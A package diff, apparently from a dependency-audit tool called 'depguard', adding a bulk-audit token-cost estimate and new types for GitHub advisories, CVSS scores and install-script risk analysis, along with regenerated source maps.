-{"version":3,"file":"tokens.d.ts","sourceRoot":"","sources":["../src/tokens.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAEH,MAAM,WAAW,YAAY;IAC3B,sCAAsC;IACtC,cAAc,EAAE,MAAM,CAAA;IACtB,0DAA0D;IAC1D,cAAc,EAAE,MAAM,CAAA;IACtB,qDAAqD;IACrD,KAAK,EAAE,MAAM,CAAA;IACb,uBAAuB;IACvB,YAAY,EAAE,MAAM,CAAA;IACpB,0DAA0D;IAC1D,WAAW,EAAE,MAAM,EAAE,CAAA;CACtB;AAED;;GAEG;AACH,wBAAgB,cAAc,CAAC,IAAI,EAAE,MAAM,GAAG,MAAM,CAEnD;AAiFD;;;;;;GAMG;AACH,wBAAgB,gBAAgB,CAC9B,IAAI,EAAE,MAAM,EACZ,YAAY,EAAE,MAAM,EACpB,QAAQ,SAAI,GACX,YAAY,CAed"}
+{"version":3,"file":"tokens.d.ts","sourceRoot":"","sources":["../src/tokens.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAEH,MAAM,WAAW,YAAY;IAC3B,sCAAsC;IACtC,cAAc,EAAE,MAAM,CAAA;IACtB,0DAA0D;IAC1D,cAAc,EAAE,MAAM,CAAA;IACtB,qDAAqD;IACrD,KAAK,EAAE,MAAM,CAAA;IACb,uBAAuB;IACvB,YAAY,EAAE,MAAM,CAAA;IACpB,0DAA0D;IAC1D,WAAW,EAAE,MAAM,EAAE,CAAA;CACtB;AAED;;GAEG;AACH,wBAAgB,cAAc,CAAC,IAAI,EAAE,MAAM,GAAG,MAAM,CAEnD;AA8FD;;;;;;GAMG;AACH,wBAAgB,gBAAgB,CAC9B,IAAI,EAAE,MAAM,EACZ,YAAY,EAAE,MAAM,EACpB,QAAQ,SAAI,GACX,YAAY,CAed"}

package/dist/tokens.js

@@ -60,6 +60,18 @@ function manualProfileFor(tool, argCount) {
                 ],
                 tokens: MANUAL_COST.webSearch * 2 + MANUAL_COST.webFetchLarge + MANUAL_COST.reasoning,
             };
+        case 'depguard_audit_bulk': {
+            const pkgCount = argCount || 10;
+            const perPkg = MANUAL_COST.webSearch * 2 + MANUAL_COST.webFetch * 3 + MANUAL_COST.reasoning;
+            return {
+                steps: [
+                    `${pkgCount}x individual audit: each requires 2x WebSearch + 3x WebFetch + reasoning (~${perPkg} tokens each)`,
+                    `Total manual cost for ${pkgCount} packages (~${perPkg * pkgCount} tokens)`,
+                    `Reasoning: consolidate findings across all packages (~${MANUAL_COST.reasoning * 2} tokens)`,
+                ],
+                tokens: perPkg * pkgCount + MANUAL_COST.reasoning * 2,
+            };
+        }
         case 'depguard_should_use': {
             // shouldUse = search + score N packages + reasoning
             const candidateCount = argCount || 5;

package/dist/tokens.js.map

@@ -1 +1 @@
-{"version":3,"file":"tokens.js","sourceRoot":"","sources":["../src/tokens.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"tokens.js","sourceRoot":"","sources":["../src/tokens.ts"],"names":[],"mappings":"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"}

package/dist/types.d.ts

@@ -65,6 +65,35 @@ export interface NpmAdvisory {
     url: string;
     vulnerable_versions: string;
     patched_versions: string | null;
+    cwe?: string[];
+    cvss?: {
+        score: number;
+        vectorString: string;
+    };
+    source?: 'npm' | 'github';
+}
+/** GitHub Advisory Database response */
+export interface GitHubAdvisory {
+    ghsa_id: string;
+    cve_id: string | null;
+    summary: string;
+    severity: 'low' | 'medium' | 'high' | 'critical';
+    html_url: string;
+    vulnerabilities: Array<{
+        package: {
+            ecosystem: string;
+            name: string;
+        };
+        vulnerable_version_range: string;
+        first_patched_version: string | null;
+    }>;
+    cwes: Array<{
+        cwe_id: string;
+    }>;
+    cvss: {
+        score: number;
+        vector_string: string;
+    } | null;
 }
 /** npm downloads response */
 export interface NpmDownloadsResponse {
@@ -73,6 +102,18 @@ export interface NpmDownloadsResponse {
     start: string;
     end: string;
 }
+/** Script analysis risk */
+export interface ScriptRisk {
+    script: string;
+    pattern: string;
+    severity: 'critical' | 'high' | 'moderate';
+    description: string;
+}
+/** Script analysis result */
+export interface ScriptAnalysis {
+    suspicious: boolean;
+    risks: ScriptRisk[];
+}
 /** Audit report for a package */
 export interface AuditReport {
     name: string;
@@ -86,6 +127,7 @@ export interface AuditReport {
     hasInstallScripts: boolean;
     deprecated: boolean;
     vulnerabilities: VulnerabilitySummary;
+    scriptAnalysis: ScriptAnalysis;
     licenseCompatibility: LicenseCompatibility;
     warnings: string[];
 }

package/dist/types.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../src/types.ts"],"names":[],"mappings":"AAAA,uDAAuD;AACvD,MAAM,MAAM,OAAO,GAAG,OAAO,UAAU,CAAC,KAAK,CAAA;AAE7C,kDAAkD;AAClD,MAAM,WAAW,cAAc;IAC7B,IAAI,EAAE,MAAM,CAAA;IACZ,WAAW,EAAE,MAAM,CAAA;IACnB,WAAW,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAA;IACnC,IAAI,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAA;IAC5B,OAAO,CAAC,EAAE,MAAM,CAAA;IAChB,QAAQ,EAAE,MAAM,CAAC,MAAM,EAAE,cAAc,CAAC,CAAA;IACxC,QAAQ,CAAC,EAAE,MAAM,EAAE,CAAA;IACnB,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,UAAU,CAAC,EAAE;QAAE,IAAI,EAAE,MAAM,CAAC;QAAC,GAAG,EAAE,MAAM,CAAA;KAAE,CAAA;IAC1C,WAAW,CAAC,EAAE,KAAK,CAAC;QAAE,IAAI,EAAE,MAAM,CAAC;QAAC,KAAK,CAAC,EAAE,MAAM,CAAA;KAAE,CAAC,CAAA;CACtD;AAED,MAAM,WAAW,cAAc;IAC7B,IAAI,EAAE,MAAM,CAAA;IACZ,OAAO,EAAE,MAAM,CAAA;IACf,OAAO,CAAC,EAAE,MAAM,CAAA;IAChB,YAAY,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAA;IACrC,eAAe,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAA;IACxC,OAAO,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAA;IAChC,UAAU,CAAC,EAAE,MAAM,CAAA;CACpB;AAED,iCAAiC;AACjC,MAAM,WAAW,eAAe;IAC9B,OAAO,EAAE,KAAK,CAAC;QACb,OAAO,EAAE;YACP,IAAI,EAAE,MAAM,CAAA;YACZ,OAAO,EAAE,MAAM,CAAA;YACf,WAAW,EAAE,MAAM,CAAA;YACnB,QAAQ,CAAC,EAAE,MAAM,EAAE,CAAA;YACnB,IAAI,EAAE,MAAM,CAAA;YACZ,KAAK,EAAE;gBAAE,GAAG,CAAC,EAAE,MAAM,CAAC;gBAAC,QAAQ,CAAC,EAAE,MAAM,CAAC;gBAAC,UAAU,CAAC,EAAE,MAAM,CAAA;aAAE,CAAA;YAC/D,SAAS,EAAE;gBAAE,QAAQ,EAAE,MAAM,CAAA;aAAE,CAAA;SAChC,CAAA;QACD,KAAK,EAAE;YACL,KAAK,EAAE,MAAM,CAAA;YACb,MAAM,EAAE;gBAAE,OAAO,EAAE,MAAM,CAAC;gBAAC,UAAU,EAAE,MAAM,CAAC;gBAAC,WAAW,EAAE,MAAM,CAAA;aAAE,CAAA;SACrE,CAAA;KACF,CAAC,CAAA;IACF,KAAK,EAAE,MAAM,CAAA;CACd;AAED,yBAAyB;AACzB,MAAM,WAAW,WAAW;IAC1B,EAAE,EAAE,MAAM,CAAA;IACV,KAAK,EAAE,MAAM,CAAA;IACb,QAAQ,EAAE,MAAM,GAAG,KAAK,GAAG,UAAU,GAAG,MAAM,GAAG,UAAU,CAAA;IAC3D,GAAG,EAAE,MAAM,CAAA;IACX,mBAAmB,EAAE,MAAM,CAAA;IAC3B,gBAAgB,EAAE,MAAM,GAAG,IAAI,CAAA;CAChC;AAED,6BAA6B;AAC7B,MAAM,WAAW,oBAAoB;IACnC,SAAS,EAAE,MAAM,CAAA;IACjB,OAAO,EAAE,MAAM,CAAA;IACf,KAAK,EAAE,MAAM,CAAA;IACb,GAAG,EAAE,MAAM,CAAA;CACZ;AAED,iCAAiC;AACjC,MAAM,WAAW,WAAW;IAC1B,IAAI,EAAE,MAAM,CAAA;IACZ,OAAO,EAAE,MAAM,CAAA;IACf,OAAO,EAAE,MAAM,GAAG,IAAI,CAAA;IACtB,WAAW,EAAE,MAAM,CAAA;IACnB,WAAW,EAAE,MAAM,GAAG,IAAI,CAAA;IAC1B,eAAe,EAAE,MAAM,CAAA;IACvB,YAAY,EAAE,MAAM,CAAA;IACpB,eAAe,EAAE,MAAM,CAAA;IACvB,iBAAiB,EAAE,OAAO,CAAA;IAC1B,UAAU,EAAE,OAAO,CAAA;IACnB,eAAe,EAAE,oBAAoB,CAAA;IACrC,oBAAoB,EAAE,oBAAoB,CAAA;IAC1C,QAAQ,EAAE,MAAM,EAAE,CAAA;CACnB;AAED,MAAM,WAAW,oBAAoB;IACnC,KAAK,EAAE,MAAM,CAAA;IACb,QAAQ,EAAE,MAAM,CAAA;IAChB,IAAI,EAAE,MAAM,CAAA;IACZ,QAAQ,EAAE,MAAM,CAAA;IAChB,GAAG,EAAE,MAAM,CAAA;IACX,UAAU,EAAE,WAAW,EAAE,CAAA;CAC1B;AAED,MAAM,WAAW,oBAAoB;IACnC,UAAU,EAAE,OAAO,CAAA;IACnB,OAAO,EAAE,MAAM,GAAG,IAAI,CAAA;IACtB,aAAa,EAAE,MAAM,CAAA;IACrB,MAAM,EAAE,MAAM,CAAA;CACf;AAED,sBAAsB;AACtB,MAAM,WAAW,WAAW;IAC1B,IAAI,EAAE,MAAM,CAAA;IACZ,KAAK,EAAE,MAAM,CAAA;IACb,SAAS,EAAE;QACT,QAAQ,EAAE,MAAM,CAAA;QAChB,WAAW,EAAE,MAAM,CAAA;QACnB,UAAU,EAAE,MAAM,CAAA;QAClB,OAAO,EAAE,MAAM,CAAA;QACf,YAAY,EAAE,MAAM,CAAA;KACrB,CAAA;IACD,QAAQ,EAAE,MAAM,EAAE,CAAA;CACnB;AAED,uCAAuC;AACvC,MAAM,WAAW,YAAY;IAC3B,QAAQ,EAAE,MAAM,CAAA;IAChB,WAAW,EAAE,MAAM,CAAA;IACnB,UAAU,EAAE,MAAM,CAAA;IAClB,OAAO,EAAE,MAAM,CAAA;IACf,YAAY,EAAE,MAAM,CAAA;CACrB;AAED,0BAA0B;AAC1B,MAAM,WAAW,WAAW;IAC1B,IAAI,EAAE,MAAM,CAAA;IACZ,OAAO,EAAE,MAAM,CAAA;IACf,WAAW,EAAE,MAAM,CAAA;IACnB,KAAK,EAAE,MAAM,CAAA;IACb,QAAQ,EAAE,MAAM,EAAE,CAAA;IAClB,IAAI,EAAE,MAAM,CAAA;CACb;AAED,qBAAqB;AACrB,MAAM,WAAW,aAAa;IAC5B,KAAK,CAAC,EAAE,MAAM,CAAA;IACd,aAAa,CAAC,EAAE,MAAM,CAAA;IACtB,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,OAAO,CAAC,EAAE,OAAO,CAAA;CAClB;AAED,6BAA6B;AAC7B,MAAM,WAAW,cAAc;IAC7B,MAAM,EAAE,MAAM,CAAA;IACd,MAAM,EAAE,SAAS,GAAG,SAAS,GAAG,oBAAoB,CAAA;IACpD,OAAO,EAAE,MAAM,GAAG,IAAI,CAAA;IACtB,KAAK,EAAE,MAAM,GAAG,IAAI,CAAA;IACpB,YAAY,EAAE,KAAK,CAAC;QAAE,IAAI,EAAE,MAAM,CAAC;QAAC,KAAK,EAAE,MAAM,CAAA;KAAE,CAAC,CAAA;IACpD,SAAS,EAAE,MAAM,CAAA;IACjB,QAAQ,EAAE,MAAM,EAAE,CAAA;CACnB;AAED,sBAAsB;AACtB,MAAM,WAAW,cAAc;IAC7B,SAAS,CAAC,EAAE,MAAM,CAAA;IAClB,aAAa,CAAC,EAAE,MAAM,CAAA;IACtB,KAAK,CAAC,EAAE,MAAM,CAAA;IACd,OAAO,CAAC,EAAE,OAAO,CAAA;CAClB;AAED,2BAA2B;AAC3B,MAAM,WAAW,UAAU,CAAC,CAAC;IAC3B,IAAI,EAAE,CAAC,CAAA;IACP,SAAS,EAAE,MAAM,CAAA;CAClB"}
+{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../src/types.ts"],"names":[],"mappings":"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